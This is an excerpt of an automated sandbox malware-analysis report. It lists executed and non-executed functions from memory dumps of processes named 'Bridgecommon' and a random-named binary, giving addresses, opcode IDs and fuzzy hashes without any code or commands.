                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_53_2_7ffd9baa0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              • Opcode ID: bb6db4555ec8a96844f600108284c5dbe3dc6a4c4a6928bd76af170f331cd35b
                                                                                              • Instruction ID: 861aa4074311bc7473e1e5be483806353c60c66f75cbe66e0361e082087b61ca
                                                                                              • Opcode Fuzzy Hash: bb6db4555ec8a96844f600108284c5dbe3dc6a4c4a6928bd76af170f331cd35b
                                                                                              • Instruction Fuzzy Hash: C541CD17B0852645E239B3FD78229ED5B408FA823FB0847B7F56E8D0D78C082485C2E9

                                                                                              Executed Functions

                                                                                              Function 00007FFD9BAC0D78 Relevance: .3, Instructions: 257COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 386eaa866d6d71fc26d08c246f2ec58513e0edc3f1a0eca0077073e8a82f9afc
                                                                                              • Instruction ID: 4826dfd0712804e01dcf733d6d05109c6b636d918a6227f242eaa43248f2b204
                                                                                              • Opcode Fuzzy Hash: 386eaa866d6d71fc26d08c246f2ec58513e0edc3f1a0eca0077073e8a82f9afc
                                                                                              • Instruction Fuzzy Hash: 6E91C171A19A8D4FE799EB6888657B97BE1FFA9314F0002BED04AD72D6CFB81405C740
                                                                                              Function 00007FFD9BAC08E8 Relevance: .1, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b7b985bbe57a24126e0f60c41fc1b8b421aa354941af2bf17934306914cfeed6
                                                                                              • Instruction ID: d40e13327d6f166c0500d9739ef0b07a077b289b4912fba3d681641a942cd6dc
                                                                                              • Opcode Fuzzy Hash: b7b985bbe57a24126e0f60c41fc1b8b421aa354941af2bf17934306914cfeed6
                                                                                              • Instruction Fuzzy Hash: F331253130D9184FDB68EB5CE88AAB977D0EF9932130541BBE48AC7176DD11EC8287C1
                                                                                              Function 00007FFD9BAC0998 Relevance: .1, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f7239b425e6ab55349bf6161675ab52db2a027861ef20d8cc4bb2ebf933dd9d2
                                                                                              • Instruction ID: 61f94702c7cf8c63ea4f527df3834e1afe0d9fbf69e516633be4f9601bd4f8a7
                                                                                              • Opcode Fuzzy Hash: f7239b425e6ab55349bf6161675ab52db2a027861ef20d8cc4bb2ebf933dd9d2
                                                                                              • Instruction Fuzzy Hash: F7213720B1991D0FE36CB76C946A679B2C2EF88365B0101BDE40EC32FACD58AC418385
                                                                                              Function 00007FFD9BAC119D Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5c9a9a4e2ded028276d665dd1bf2f9f309c14f671636231342ed12af176a2e56
                                                                                              • Instruction ID: 62f1308f6de71a2a2d4e29b3898fa0efa076a42d04e9cda1b6ac7044abb916a1
                                                                                              • Opcode Fuzzy Hash: 5c9a9a4e2ded028276d665dd1bf2f9f309c14f671636231342ed12af176a2e56
                                                                                              • Instruction Fuzzy Hash: 5631A431B0954E8FDB55EB68C8689B97BF1EF65300F0545BAD009D72A2DE68A541C740
                                                                                              Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 61fa2b9f92651bdc2d4f9af743ab1e7f01d7fb38ec209a445e8704db9230a93a
                                                                                              • Instruction ID: f6b3cc9fcca3cb60ee173bb445d8f28db1a41c548c4fe0304f2f4b4db347d3b4
                                                                                              • Opcode Fuzzy Hash: 61fa2b9f92651bdc2d4f9af743ab1e7f01d7fb38ec209a445e8704db9230a93a
                                                                                              • Instruction Fuzzy Hash: 84210536B0E29D8BE732FBA898210EC7B60EF52325F0542F3D458CB1D3D9282646C785
                                                                                              Function 00007FFD9BAC1B9F Relevance: .1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0901347b73a06ee780452c95826782669dc13ea72da80e979ac6d9864f9b5b48
                                                                                              • Instruction ID: ab4812dca5babaa78afcbf4a833f93974222dea7e4338df8fa6d4a4f5a51e8b8
                                                                                              • Opcode Fuzzy Hash: 0901347b73a06ee780452c95826782669dc13ea72da80e979ac6d9864f9b5b48
                                                                                              • Instruction Fuzzy Hash: 88214721F1E90D4FEBB4F7A884646B862D2EF94711F5642B5D00DD72F2EDB8AE418740
                                                                                              Function 00007FFD9BAC0C40 Relevance: .1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e3c32c3a65730ab4c49d5a090f473ca2accbe3741be07b848b9e449af3e066a0
                                                                                              • Instruction ID: 1a92111710cbc1cf06b5594c6ec0a9d22fb7baa36bd6c9175c815ebb2e8d41b0
                                                                                              • Opcode Fuzzy Hash: e3c32c3a65730ab4c49d5a090f473ca2accbe3741be07b848b9e449af3e066a0
                                                                                              • Instruction Fuzzy Hash: 5311E135A0E28C8FE722EBA8C8601AC7FB0EF02710F0642F7C054DB2A3D93826458784
                                                                                              Function 00007FFD9BAC0C48 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 740d49198ff19cc20e29aa0a6143009df594b2c0ec20324a79feb5f1e5a0fd6b
                                                                                              • Instruction ID: 7f8f021851b05ec7d0c2ce9a62607fecdef8cbd21f981fe9e1c92c4f58f7f256
                                                                                              • Opcode Fuzzy Hash: 740d49198ff19cc20e29aa0a6143009df594b2c0ec20324a79feb5f1e5a0fd6b
                                                                                              • Instruction Fuzzy Hash: CA019235A0E38D9FD722EBA4C8605AC7FB0EF06710F1641E7D454DB2A3D97866458781
                                                                                              Function 00007FFD9BAC0C50 Relevance: .0, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0d486f82d8502df5eccde245e033107b3fa3ff4c551d59645579c48ebd378012
                                                                                              • Instruction ID: 2d1198ed24761fc4a064eb9fbf46257ecf60e2f11afe8a488522c5a771373877
                                                                                              • Opcode Fuzzy Hash: 0d486f82d8502df5eccde245e033107b3fa3ff4c551d59645579c48ebd378012
                                                                                              • Instruction Fuzzy Hash: 5D018F34E0E38D9FEB22EBA488605AC7FB0EF06B04F1542E7D454DB2A3D9786B448745
                                                                                              Function 00007FFD9BAC1C2D Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction ID: d72e7acac59685de3f10443775069e563b4a0abb0b030ed3b8c06809fcadaed4
                                                                                              • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction Fuzzy Hash: 4CF0E134B5941E8BEBB4BB54C8A47B87362FF50711F5542F9C00D931A1DEB86A818B40
                                                                                              Function 00007FFD9BAC0B77 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5de9aa42918dc07795adaa7e8dc1679368c7079707c5e510d836251ab69f3e48
                                                                                              • Instruction ID: 1dc0a5c8756665569e28c1c7183fbc0584997eb17b7e4e931bbf379fa94e0847
                                                                                              • Opcode Fuzzy Hash: 5de9aa42918dc07795adaa7e8dc1679368c7079707c5e510d836251ab69f3e48
                                                                                              • Instruction Fuzzy Hash: E1F0553131E64CCFC781AB38CC998E83B60EB43205B9A11FAC08AC7462C220186ECB40
                                                                                              Function 00007FFD9BAC1CDA Relevance: .0, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction ID: 7511c8b879304e4b427c46b8264d8d6e12a1dbf2d808d9589d55287f57287a7c
                                                                                              • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction Fuzzy Hash: 01F0D024F0D40E4BEAB4F758C8A46B83352AF90711F5582B5C40D972F5DD786E468A40
                                                                                              Function 00007FFD9BAC42E9 Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eea4177a97fea19c67560aa28d5657cbe48d24b30c60c51eb934e5c290a6ef1b
                                                                                              • Instruction ID: bb84f4424a8031a86eaf4a6ac7768211844605948ba17d26014171f5dc6da58e
                                                                                              • Opcode Fuzzy Hash: eea4177a97fea19c67560aa28d5657cbe48d24b30c60c51eb934e5c290a6ef1b
                                                                                              • Instruction Fuzzy Hash: 97F02270518A1CCFCF98EF08C495EE9B7F1FB68305F114199914AE7260CB31AA80CF85
                                                                                              Function 00007FFD9BAC2AD5 Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction ID: 230c769efbd0ae23a541d479a6bf6fd8131393523f1b2e90ee770d929ded3f71
                                                                                              • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                                              • Instruction Fuzzy Hash: 8DE01230F0D11A46FBB4B754D8617F962A0DB64300F2110B8D50ED33D1DD78AF418A49
                                                                                              Function 00007FFD9BAC06A5 Relevance: .0, Instructions: 13COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction ID: 6df2b10d3ddf44c48e3a0479f872ac8fec584a9aa252f963579a03fc7edef226
                                                                                              • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                                              • Instruction Fuzzy Hash: 15C04C05F5B51F01F8357BEE64660BCB1405BD5A10FD70172D55D820E19CEE22D5415E
                                                                                              Function 00007FFD9BAC1310 Relevance: .0, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction ID: 101bb35f273d927ab00ea2fc1bbe702891d8e704bb009a5f3c989da61d22e23d
                                                                                              • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                                              • Instruction Fuzzy Hash: ADC04C3455180D8FC958FB69CC9992477A0FB19315BD60090E409C7275E659DDD6C741
                                                                                              Function 00007FFD9BAC4E17 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction ID: db5b3f207a421dc53e70be9b731f65d61f488f42ebffb6c514a6dd16de34bfda
                                                                                              • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                                              • Instruction Fuzzy Hash: 07C08CA1E1820945E734A7A048291BA73818F00220F628672805EA70A2EE6856026680
                                                                                              Function 00007FFD9BAC2555 Relevance: .0, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b37f417694fa82bfb45a749df6edb8683e53e25f9ad118d5d1aaf04b8164b456
                                                                                              • Instruction ID: 19fa962a5ec4e235b4f84a3133a04002eefd38457f2a4de96f83154f0d1b0b83
                                                                                              • Opcode Fuzzy Hash: b37f417694fa82bfb45a749df6edb8683e53e25f9ad118d5d1aaf04b8164b456
                                                                                              • Instruction Fuzzy Hash: EBC04C01F1881E07F359671444315BE04835F54768F6546B4E01E976DECD4C592107C7
                                                                                              Function 00007FFD9BAC06C8 Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction ID: ab030b86c4bcf3b1657126a11f365bd75a6e5d39b1a09ea4130e55803ddecb7e
                                                                                              • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                                              • Instruction Fuzzy Hash: CBB01200E5740F00E83433FB18520B870405B44100FC20170D40D8109198DE1294024A

                                                                                              Non-executed Functions

                                                                                              Function 00007FFD9BAC09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000036.00000002.2624133627.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_54_2_7ffd9bac0000_nFQRHbQjcuhfqIAubZpdQD.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: c9$!k9$"s9$#{9
                                                                                              • API String ID: 0-1692736845
                                                                                              • Opcode ID: 0c3b06beb0677065432428f0b9d6bcea3016760cb5bde0b927d35fb793fcb833
                                                                                              • Instruction ID: 943e67d24a289ae94424641f4274a367810d43296ff82d20f4cccdf8297165db
                                                                                              • Opcode Fuzzy Hash: 0c3b06beb0677065432428f0b9d6bcea3016760cb5bde0b927d35fb793fcb833
                                                                                              • Instruction Fuzzy Hash: 79415E07B0946A45E32977FD78219FD6B448FA923FB0843B7F85E8D0D74C486081C2E9

                                                                                              Executed Functions

                                                                                              Function 00007FFD9BAE09AC Relevance: 1.6, Instructions: 1644COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eace6fd7884b5202b99ffa1cc342309f039be07fa55fbe9d00f346ee9287782f
                                                                                              • Instruction ID: 638a291d7505c94ad125764ad5c81229d25cea754d02e3121c80007e10c86ff9
                                                                                              • Opcode Fuzzy Hash: eace6fd7884b5202b99ffa1cc342309f039be07fa55fbe9d00f346ee9287782f
                                                                                              • Instruction Fuzzy Hash: E3C2C531B1991E4FEBA8EB5884A1AB87392FFA8350F0542B9D01DC72D7DD78BD418781
                                                                                              Function 00007FFD9BB01000 Relevance: .4, Instructions: 400COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5d06b3dd888a6dcf83fbd24a10f4f31b7238f132e43f3122bb876512fb24da28
                                                                                              • Instruction ID: 29a257cdb54c29e488bb56fda270c9e157672a6cdd1fd31da85554e854ce2be3
                                                                                              • Opcode Fuzzy Hash: 5d06b3dd888a6dcf83fbd24a10f4f31b7238f132e43f3122bb876512fb24da28
                                                                                              • Instruction Fuzzy Hash: A9B17C21B6D79A0BE32D8A6C48920B573C1FB9330DB15877DE8DBC359BD928E50786C1
                                                                                              Function 00007FFD9BAD0D78 Relevance: .3, Instructions: 263COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: faba7ebe20e93a4784cdb339ea5f30e6bcdfc1768c86c721166dbcbd5737e02a
                                                                                              • Instruction ID: be7451a2b22a450d03ff35be8cfb3488d50b7d66a64c0b6fee3d2b15a1423958
                                                                                              • Opcode Fuzzy Hash: faba7ebe20e93a4784cdb339ea5f30e6bcdfc1768c86c721166dbcbd5737e02a
                                                                                              • Instruction Fuzzy Hash: E691D672E19A898FE75DDB6888697A97FE0FF99324F0102BED049C72D6CBB81405C740
                                                                                              Function 00007FFD9BAFA59E Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: [
                                                                                              • API String ID: 0-784033777
                                                                                              • Opcode ID: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                                              • Instruction ID: bbf7a2260f85285b4908543e04c03b12b0e80d2114a3353d194ffcbe533aaa0c
                                                                                              • Opcode Fuzzy Hash: 2e22b873c191d49c490a480e30419d343806f7026aeb5de892ad85ba87155204
                                                                                              • Instruction Fuzzy Hash: F3119431A1CB588FDB64DF18C4456AABBE1FB98711F12053ED489E3270CB74B9418B83
                                                                                              Function 00007FFD9BB01B38 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: bfbefb590432468084fd49266a04cd45f1a3350012849f0dde65ead55788496e
                                                                                              • Instruction ID: 9d4c664d71cd1ef77a1365299136f9f7734d95e4671a2bb8773e28da2f205024
                                                                                              • Opcode Fuzzy Hash: bfbefb590432468084fd49266a04cd45f1a3350012849f0dde65ead55788496e
                                                                                              • Instruction Fuzzy Hash: 9D11BF2150F3C54FDB57977488289A97FA0AF43615B0A81EEE0C5CF0F3DA69494AC712
                                                                                              Function 00007FFD9BAF5769 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 5645e9c95e10507c81d28ecf6e6c674d3af451f6d614477c019ba94662d51f03
                                                                                              • Instruction ID: fc38cdb605ba5b6bc51c43ac383f40d75dc8d17da9596b066e0b5616aefb82e3
                                                                                              • Opcode Fuzzy Hash: 5645e9c95e10507c81d28ecf6e6c674d3af451f6d614477c019ba94662d51f03
                                                                                              • Instruction Fuzzy Hash: 4E014F2454E3D54FCB17977884644E5BF70EE1726070A92EFD085CF4A3E61C898ACB41
                                                                                              Function 00007FFD9BB0AC83 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C7
                                                                                              • API String ID: 0-2279091541
                                                                                              • Opcode ID: 74650801e3cc4e640c2306cf05c75938f421c058a6a6324b518f02867f18d2f0
                                                                                              • Instruction ID: 82ec448632bd9d226ccb6cd4c03472d2d2ceabdeffa33a078a69233e6e68bb07
                                                                                              • Opcode Fuzzy Hash: 74650801e3cc4e640c2306cf05c75938f421c058a6a6324b518f02867f18d2f0
                                                                                              • Instruction Fuzzy Hash: FDF0B421B0990E4FF6A9E65848EA7B862C2FF98315F054476E04CC71E7DE2868814241
                                                                                              Function 00007FFD9BB0A039 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
